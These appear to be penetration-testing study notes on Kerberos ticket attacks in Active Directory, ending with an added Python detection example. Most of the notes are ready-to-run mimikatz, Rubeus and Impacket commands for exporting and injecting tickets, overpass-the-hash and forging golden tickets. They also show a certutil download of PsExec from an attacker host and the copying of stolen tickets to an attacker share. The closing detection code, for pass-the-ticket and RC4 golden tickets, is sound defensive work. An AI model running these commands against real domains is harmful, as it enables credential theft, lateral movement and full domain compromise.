
Ticket Attacks

24.4.1 - Pass-The-Ticket

Pass-the-Ticket reuses Kerberos tickets instead of passwords or hashes. It takes advantage of the TGS by exporting tickets (TGTs and service tickets) from a compromised host, then either injecting them into memory (on the target) or caching them in a file referenced by an environment variable (on Kali), and finally authenticating with the injected/cached ticket via Kerberos-based authentication rather than NTLM-based authentication.

  • This attack does not require the service/user to have local admin rights on the target.

PTT via COMPROMISED HOST (export -> inject into memory -> psexec.exe)
Extract tickets from memory (TGTs and service tickets, together with the associated user/service information)

sekurlsa::tickets /export

List the Kerberos tickets currently held in the LSA

kerberos::list
.\Rubeus.exe klist

Inject into memory

kerberos::ptt [ticket_name.kirbi]

Authenticate to the remote target using the ticket

psexec.exe \\target.hostname.com cmd

Alternatively, request a TGT and inject it with Rubeus

Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

PTT via KALI (export -> cache as env var -> psexec.py/smbexec.py/wmiexec.py)
Export the tickets, then copy them to Kali

sekurlsa::tickets /export
copy [ticket.kirbi] \\192.168.119.XXX\share\[ticket.kirbi]

Use ticket_converter.py to convert .kirbi to .ccache
https://github.com/Zer1t0/ticket_converter

python ticket_converter.py ticket.kirbi ticket.ccache

Point Impacket at the ticket by setting the credential cache path

export KRB5CCNAME=<TGT_ccache_file_path>

Execute remote commands with any of the following, authenticating with the cached TGT

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

24.4.3 - TGT Impersonation

Run on the target

This should show no TGT/TGS yet

klist

Generate a TGT by authenticating to a network share on the computer. Try other computers and targets if needed.

net use \\SV-FILE01

This should now show a TGT/TGS

klist
certutil -urlcache -split -f http://192.168.119.140:80/PsExec.exe
.\PsExec.exe \\SV-FILE01 cmd.exe

24.4.4 - Golden Ticket + PsExec (Overpass the Hash)

Note that if an IP address is used instead of a hostname, Kerberos will not be used and authentication falls back to NTLM (which may fail)

mimikatz # kerberos::golden /user:<user> /domain:<domain> /sid:<SID> /krbtgt:<NTLM_hash> /ptt
mimikatz # misc::cmd
PsExec.exe \\<hostname> cmd.exe

24.4.5 - Overpass-the-hash

Spawns a process (PowerShell or cmd) in the security context of the specified user

mimikatz # sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<NTLM_HASH> /run:powershell

24.4.6 - Create a Golden Ticket

Creating a golden ticket grants virtually unrestricted access to the whole domain. Use the following mimikatz commands (a few example invocations):

mimikatz "kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-XXXX /krbtgt:eeb9046b77d48962314e376f1925065a /id:500"
mimikatz # kerberos::golden /user:<user> /domain:<domain> /sid:<domain SID> /krbtgt:<NTLM hash> /ptt

Forge a Kerberos TGT as Administrator

kerberos::golden /user:Administrator /domain:AFC-RICHMOND.LOCAL /sid:S-1-5-21-XXXX /krbtgt:<hash> /id:500 /aes256:<aes256_key> /ticket:admin.kirbi

Using the RC4 (NTLM) key instead

kerberos::golden /user:Administrator /domain:AFC-RICHMOND.LOCAL /sid:S-1-5-21-XXXX /rc4:<ntlm_hash> /id:500 /ticket:admin.kirbi

Inject the ticket into the current session

kerberos::ptt admin.kirbi
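A defender-side counterpart to Pass-the-Ticket (24.4.1) and to golden tickets forged from the RC4/NTLM krbtgt key (24.4.6). This is an added example, not part of the original notes: it runs two common detection heuristics over a constructed set of Windows Security events 4768 (TGT requested) and 4769 (service ticket requested). Rule 1 flags a service-ticket request from a client/user pair that never obtained a TGT from the KDC inside the TGT lifetime, which is what an injected (kerberos::ptt, KRB5CCNAME) or forged TGT looks like in the log; TGT renewals (4769 for krbtgt) legitimately extend that window and are handled. Rule 2 flags RC4-HMAC (etype 0x17) service tickets on a domain where AES256 (0x12) is expected, the footprint of kerberos::golden with /rc4 or an NTLM /krbtgt key. The event field names and etype values are the documented ones; the sample accounts, IPs, timestamps, the 10-hour window and the assumption that AES is the domain baseline are all constructed for the example. Rule 1 only works over centralised DC logs (the 4768 and 4769 may be issued by different DCs) and both rules are leads for triage, not proof.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Kerberos TicketEncryptionType values as logged in 4768/4769 (hex in the event XML).
ETYPE_RC4_HMAC = 0x17   # tickets built from an NTLM/RC4 key (e.g. /rc4, /krbtgt:<NTLM>)
ETYPE_AES256 = 0x12     # what a current domain normally issues


@dataclass(frozen=True)
class KerbEvent:
    """Minimal projection of a Security-log Kerberos event (constructed, not real log data)."""
    event_id: int        # 4768 = TGT requested (AS-REQ), 4769 = service ticket requested (TGS-REQ)
    time: datetime
    user: str            # TargetUserName, realm stripped
    client_ip: str       # IpAddress
    etype: int           # TicketEncryptionType
    service: str = ""    # ServiceName, 4769 only


def tgs_without_as(events, window=timedelta(hours=10)):
    """Rule 1: a 4769 for (user, ip) with no 4768 for the same pair inside `window`.
    An imported or forged TGT never went through the AS exchange, so the service-ticket
    requests it produces have no matching TGT request. `window` assumes the default
    10h TGT lifetime; a 4769 for krbtgt is a renewal and extends it."""
    last_tgt = {}        # (user, ip) -> time the KDC last issued/renewed a TGT
    hits = []
    for ev in sorted(events, key=lambda e: e.time):
        key = (ev.user.lower(), ev.client_ip)
        if ev.event_id == 4768:
            last_tgt[key] = ev.time
        elif ev.event_id == 4769:
            issued = last_tgt.get(key)
            fresh = issued is not None and ev.time - issued <= window
            if not fresh:
                hits.append((key, f"4769 for {ev.service} with no 4768 from this client in window"))
            elif ev.service.lower().startswith("krbtgt"):
                last_tgt[key] = ev.time          # legitimate renewal of a KDC-issued TGT
    return hits


def rc4_downgrade(events, expected=ETYPE_AES256):
    """Rule 2: service tickets using RC4 where AES is expected. Accounts or legacy
    clients that genuinely still use RC4 must be baselined before alerting on this."""
    hits = []
    for ev in events:
        if ev.event_id == 4769 and ev.etype == ETYPE_RC4_HMAC and expected != ETYPE_RC4_HMAC:
            hits.append(((ev.user.lower(), ev.client_ip),
                         f"4769 for {ev.service} used RC4 (0x17), expected 0x{expected:02x}"))
    return hits


def analyze(events):
    """Return {(user, client_ip): [reasons]}; a pair hit by both rules deserves first look."""
    findings = {}
    for key, why in tgs_without_as(events) + rc4_downgrade(events):
        findings.setdefault(key, []).append(why)
    return findings


# Constructed sample log (not real data): alice is a normal logon, bob renews his TGT,
# Administrator@10.0.0.77 uses an RC4 ticket against the file server with no TGT request.
T = datetime(2024, 1, 15)
SAMPLE = [
    KerbEvent(4768, T.replace(hour=0, minute=30), "bob", "10.0.0.9", ETYPE_AES256),
    KerbEvent(4768, T.replace(hour=8, minute=0), "alice", "10.0.0.5", ETYPE_AES256),
    KerbEvent(4769, T.replace(hour=8, minute=0), "bob", "10.0.0.9", ETYPE_AES256, "krbtgt"),
    KerbEvent(4769, T.replace(hour=8, minute=1), "alice", "10.0.0.5", ETYPE_AES256, "SV-FILE01$"),
    KerbEvent(4769, T.replace(hour=9, minute=30), "Administrator", "10.0.0.77", ETYPE_RC4_HMAC, "SV-FILE01$"),
    KerbEvent(4769, T.replace(hour=9, minute=35), "bob", "10.0.0.9", ETYPE_AES256, "SV-FILE01$"),
]

if __name__ == "__main__":
    for (user, ip), reasons in analyze(SAMPLE).items():
        print(f"{user}@{ip}:")
        for reason in reasons:
            print("   ", reason)
```

Running the block prints only the Administrator@10.0.0.77 pair, with both reasons; alice and bob are not reported because their service tickets follow a KDC-issued (or renewed) TGT and use the expected encryption type.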